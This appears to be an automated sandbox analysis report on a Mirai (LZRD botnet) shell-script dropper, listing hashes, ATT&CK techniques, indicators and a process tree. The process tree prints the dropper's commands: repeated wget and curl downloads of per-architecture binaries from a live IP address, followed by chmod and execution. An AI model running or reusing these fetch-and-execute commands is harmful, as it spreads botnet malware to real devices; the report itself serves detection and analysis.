mirai | f58a06a7be85427f150ab29567daa86227c274acef7657fcb12a74ef64d6b2cb

Analysis

max time kernel
139s
max time network
149s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
01/04/2025, 03:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ohshit.sh
Size

3KB
MD5

49ccb38dd7e10864370e97b7037c2880
SHA1

e0db7b2cf8aecb8664fd87164f638103418eb9ab
SHA256

f58a06a7be85427f150ab29567daa86227c274acef7657fcb12a74ef64d6b2cb
SHA512

cde0c823211fb1a86e88644c9daad843ecb11c49d91256c943d2baef250a2243cd9bcc4c7b68bde3139b441b124503b235bf12583c8c9d22e61a14fe0c59806e

Score

10^/10

mirai lzrd botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 15 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1527	chmod
1547	chmod
1567	chmod
1579	chmod
1639	chmod
1557	chmod
1649	chmod
1659	chmod
1521	chmod
1609	chmod
1629	chmod
1537	chmod
1589	chmod
1599	chmod
1619	chmod

Executes dropped EXE 15 IoCs

ioc	pid	Process
/tmp/Chaotic	1522	ohshit.sh
/tmp/Chaotic	1528	ohshit.sh
/tmp/Chaotic	1538	ohshit.sh
/tmp/Chaotic	1548	ohshit.sh
/tmp/Chaotic	1558	ohshit.sh
/tmp/Chaotic	1568	ohshit.sh
/tmp/Chaotic	1580	ohshit.sh
/tmp/Chaotic	1590	ohshit.sh
/tmp/Chaotic	1600	ohshit.sh
/tmp/Chaotic	1610	ohshit.sh
/tmp/Chaotic	1620	ohshit.sh
/tmp/Chaotic	1630	ohshit.sh
/tmp/Chaotic	1640	ohshit.sh
/tmp/Chaotic	1650	ohshit.sh
/tmp/Chaotic	1660	ohshit.sh

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	ohshit.sh
File opened for modification	/dev/misc/watchdog	ohshit.sh

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to system bin folder 2 IoCs

description	ioc	Process
File opened for modification	/bin/watchdog	ohshit.sh
File opened for modification	/sbin/watchdog	ohshit.sh

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/fstream-5.dat	upx

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/11/status	ohshit.sh
File opened for reading	/proc/186/status	ohshit.sh
File opened for reading	/proc/693/status	ohshit.sh
File opened for reading	/proc/1133/status	ohshit.sh
File opened for reading	/proc/1551/status	ohshit.sh
File opened for reading	/proc/1563/status	ohshit.sh
File opened for reading	/proc/137/status	ohshit.sh
File opened for reading	/proc/23/status	ohshit.sh
File opened for reading	/proc/32/status	ohshit.sh
File opened for reading	/proc/36/status	ohshit.sh
File opened for reading	/proc/81/status	ohshit.sh
File opened for reading	/proc/422/status	ohshit.sh
File opened for reading	/proc/471/status	ohshit.sh
File opened for reading	/proc/1306/status	ohshit.sh
File opened for reading	/proc/182/status	ohshit.sh
File opened for reading	/proc/183/status	ohshit.sh
File opened for reading	/proc/1026/status	ohshit.sh
File opened for reading	/proc/1101/status	ohshit.sh
File opened for reading	/proc/1151/status	ohshit.sh
File opened for reading	/proc/1511/status	ohshit.sh
File opened for reading	/proc/1590/status	ohshit.sh
File opened for reading	/proc/1633/status	ohshit.sh
File opened for reading	/proc/174/status	ohshit.sh
File opened for reading	/proc/457/status	ohshit.sh
File opened for reading	/proc/1078/status	ohshit.sh
File opened for reading	/proc/1506/status	ohshit.sh
File opened for reading	/proc/1653/status	ohshit.sh
File opened for reading	/proc/3/status	ohshit.sh
File opened for reading	/proc/79/status	ohshit.sh
File opened for reading	/proc/80/status	ohshit.sh
File opened for reading	/proc/181/status	ohshit.sh
File opened for reading	/proc/421/status	ohshit.sh
File opened for reading	/proc/615/status	ohshit.sh
File opened for reading	/proc/1290/status	ohshit.sh
File opened for reading	/proc/1580/status	ohshit.sh
File opened for reading	/proc/4/status	ohshit.sh
File opened for reading	/proc/12/status	ohshit.sh
File opened for reading	/proc/22/status	ohshit.sh
File opened for reading	/proc/84/status	ohshit.sh
File opened for reading	/proc/190/status	ohshit.sh
File opened for reading	/proc/216/status	ohshit.sh
File opened for reading	/proc/678/status	ohshit.sh
File opened for reading	/proc/1278/status	ohshit.sh
File opened for reading	/proc/1/status	ohshit.sh
File opened for reading	/proc/2/status	ohshit.sh
File opened for reading	/proc/5/status	ohshit.sh
File opened for reading	/proc/83/status	ohshit.sh
File opened for reading	/proc/281/status	ohshit.sh
File opened for reading	/proc/1137/status	ohshit.sh
File opened for reading	/proc/1340/status	ohshit.sh
File opened for reading	/proc/1510/status	ohshit.sh
File opened for reading	/proc/82/status	ohshit.sh
File opened for reading	/proc/1179/status	ohshit.sh
File opened for reading	/proc/1232/status	ohshit.sh
File opened for reading	/proc/1318/status	ohshit.sh
File opened for reading	/proc/1613/status	ohshit.sh
File opened for reading	/proc/1655/status	ohshit.sh
File opened for reading	/proc/172/status	ohshit.sh
File opened for reading	/proc/215/status	ohshit.sh
File opened for reading	/proc/656/status	ohshit.sh
File opened for reading	/proc/1075/status	ohshit.sh
File opened for reading	/proc/1121/status	ohshit.sh
File opened for reading	/proc/1541/status	ohshit.sh
File opened for reading	/proc/1550/status	ohshit.sh

System Network Configuration Discovery 1 TTPs 4 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1564	wget
1565	curl
1554	wget
1555	curl

Writes file to tmp directory 30 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sh4	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86_64	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86_64	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm5	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.m68k	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arc	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mpsl	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arc	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.i686	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm7	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.ppc	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.i686	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips64	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.ppc	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mpsl	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm6	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm6	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sh4	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sparc	curl
File opened for modification	/tmp/Chaotic	ohshit.sh
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm5	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm7	curl
File opened for modification	/tmp/busybox	cp
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.m68k	wget

/tmp/ohshit.sh
/tmp/ohshit.sh
1⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
- Writes file to tmp directory
PID:1513
- /bin/cp
  cp /bin/busybox /tmp/
  2⤵
  - Writes file to tmp directory
  PID:1514
- /usr/bin/wget
  wget http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - Writes file to tmp directory
  PID:1515
- /usr/bin/curl
  curl -O http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - Writes file to tmp directory
  PID:1519
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  PID:1520
- /bin/chmod
  chmod +x busybox Chaotic config-err-9v8ijU netplan_6o2m7k83 ohshit.sh snap-private-tmp ssh-X651Ud74vhtf systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-iLqnzW systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-timedated.service-mTjXEa ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - File and Directory Permissions Modification
  PID:1521
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:1522
- /usr/bin/wget
  wget http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - Writes file to tmp directory
  PID:1524
- /usr/bin/curl
  curl -O http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - Writes file to tmp directory
  PID:1525
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  PID:1526
- /bin/chmod
  chmod +x busybox Chaotic config-err-9v8ijU netplan_6o2m7k83 ohshit.sh snap-private-tmp ssh-X651Ud74vhtf systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-iLqnzW systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-timedated.service-mTjXEa ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1527
- /usr/bin/wget
  wget http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1534
- /usr/bin/curl
  curl -O http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1535
- /bin/chmod
  chmod +x busybox Chaotic config-err-9v8ijU netplan_6o2m7k83 ohshit.sh snap-private-tmp ssh-X651Ud74vhtf systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-iLqnzW systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-timedated.service-mTjXEa ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1537
- /usr/bin/wget
  wget http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.i686
  2⤵
  - Writes file to tmp directory
  PID:1544
- /usr/bin/curl
  curl -O http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.i686
  2⤵
  - Writes file to tmp directory
  PID:1545
- /bin/chmod
  chmod +x busybox Chaotic config-err-9v8ijU netplan_6o2m7k83 ohshit.sh snap-private-tmp ssh-X651Ud74vhtf systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-iLqnzW systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-timedated.service-mTjXEa ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1547
- /usr/bin/wget
  wget http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1554
- /usr/bin/curl
  curl -O http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1555
- /bin/chmod
  chmod +x busybox Chaotic config-err-9v8ijU netplan_6o2m7k83 ohshit.sh snap-private-tmp ssh-X651Ud74vhtf systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-iLqnzW systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-timedated.service-mTjXEa ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1557
- /usr/bin/wget
  wget http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips64
  2⤵
  - System Network Configuration Discovery
  PID:1564
- /usr/bin/curl
  curl -O http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips64
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1565
- /bin/chmod
  chmod +x busybox Chaotic config-err-9v8ijU netplan_6o2m7k83 ohshit.sh snap-private-tmp ssh-X651Ud74vhtf systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-iLqnzW systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-timedated.service-mTjXEa ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1567
- /usr/bin/wget
  wget http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1574
- /usr/bin/curl
  curl -O http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1577
- /bin/chmod
  chmod +x busybox Chaotic config-err-9v8ijU netplan_6o2m7k83 ohshit.sh snap-private-tmp ssh-X651Ud74vhtf systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-iLqnzW systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1579
- /usr/bin/wget
  wget http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm
  2⤵
  - Writes file to tmp directory
  PID:1586
- /usr/bin/curl
  curl -O http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm
  2⤵
  - Writes file to tmp directory
  PID:1587
- /bin/chmod
  chmod +x busybox Chaotic config-err-9v8ijU netplan_6o2m7k83 ohshit.sh snap-private-tmp ssh-X651Ud74vhtf systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-iLqnzW systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1589
- /usr/bin/wget
  wget http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm5
  2⤵
  - Writes file to tmp directory
  PID:1596
- /usr/bin/curl
  curl -O http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm5
  2⤵
  - Writes file to tmp directory
  PID:1597
- /bin/chmod
  chmod +x busybox Chaotic config-err-9v8ijU netplan_6o2m7k83 ohshit.sh snap-private-tmp ssh-X651Ud74vhtf systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-iLqnzW systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1599
- /usr/bin/wget
  wget http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm6
  2⤵
  - Writes file to tmp directory
  PID:1606
- /usr/bin/curl
  curl -O http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm6
  2⤵
  - Writes file to tmp directory
  PID:1607
- /bin/chmod
  chmod +x busybox Chaotic config-err-9v8ijU netplan_6o2m7k83 ohshit.sh snap-private-tmp ssh-X651Ud74vhtf systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-iLqnzW systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1609
- /usr/bin/wget
  wget http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm7
  2⤵
  - Writes file to tmp directory
  PID:1616
- /usr/bin/curl
  curl -O http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm7
  2⤵
  - Writes file to tmp directory
  PID:1617
- /bin/chmod
  chmod +x busybox Chaotic config-err-9v8ijU netplan_6o2m7k83 ohshit.sh snap-private-tmp ssh-X651Ud74vhtf systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-iLqnzW systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1619
- /usr/bin/wget
  wget http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.ppc
  2⤵
  - Writes file to tmp directory
  PID:1626
- /usr/bin/curl
  curl -O http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.ppc
  2⤵
  - Writes file to tmp directory
  PID:1627
- /bin/chmod
  chmod +x busybox Chaotic config-err-9v8ijU netplan_6o2m7k83 ohshit.sh snap-private-tmp ssh-X651Ud74vhtf systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-iLqnzW systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1629
- /usr/bin/wget
  wget http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.sparc
  2⤵
  PID:1636
- /usr/bin/curl
  curl -O http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.sparc
  2⤵
  - Writes file to tmp directory
  PID:1637
- /bin/chmod
  chmod +x busybox Chaotic config-err-9v8ijU netplan_6o2m7k83 ohshit.sh snap-private-tmp ssh-X651Ud74vhtf systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-iLqnzW systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1639
- /usr/bin/wget
  wget http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.m68k
  2⤵
  - Writes file to tmp directory
  PID:1646
- /usr/bin/curl
  curl -O http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.m68k
  2⤵
  - Writes file to tmp directory
  PID:1647
- /bin/chmod
  chmod +x busybox Chaotic config-err-9v8ijU netplan_6o2m7k83 ohshit.sh snap-private-tmp ssh-X651Ud74vhtf systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-iLqnzW systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1649
- /usr/bin/wget
  wget http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.sh4
  2⤵
  - Writes file to tmp directory
  PID:1656
- /usr/bin/curl
  curl -O http://194.62.248.25/HideChaotic/ub8ehJSePAfc9FYqZIT6.sh4
  2⤵
  - Writes file to tmp directory
  PID:1657
- /bin/chmod
  chmod +x busybox Chaotic config-err-9v8ijU netplan_6o2m7k83 ohshit.sh snap-private-tmp ssh-X651Ud74vhtf systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-bolt.service-qh9Bty systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-colord.service-2NrGhF systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-ModemManager.service-iLqnzW systemd-private-fcb68b156ed6418fbe9e8a3cc0caf011-systemd-resolved.service-eF5Jra ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sh4 ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1659

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/Chaotic

Filesize
37KB

MD5
31b7d9bdcc8860b4b7c343ca7bb13e6b

SHA1
78aa1238d316015a513c7381177a9383cde94eaf

SHA256
f539661f7ef0d1f43fc8675df50632695f7e0fc437025470deea8364c9e9fa93

SHA512
35e55dfaf6e18e93caade323e304f4e6a61863f8a02920214fb565a516d691ddd0f2d4973ced5457062df3ba1c9ecd47e4cee813aafea36a172e826ddda7e6be

Download Submit
/tmp/busybox

Filesize
2.0MB

MD5
b4dede5fc0b1bad5cb8e901bde126b97

SHA1
10cbe9a418ad84a1ed297948539d37aeb58dd810

SHA256
a9f0735d28f9a6a4f2634d3b144156f7b3df3b476a16a5ab0c7bdf98d74dd020

SHA512
45665ce3a42f63a01fdef517e0c4cb943efce64c8a32d3ce07ab4f1fafc23cda77f378d324342efc79dc9d2293c4b4454d06c1cf4997b9e866784de01cb546e6

Download Submit
/tmp/ub8ehJSePAfc9FYqZIT6.arc

Filesize
113KB

MD5
1af5f72aaf665cac323309f76f213da0

SHA1
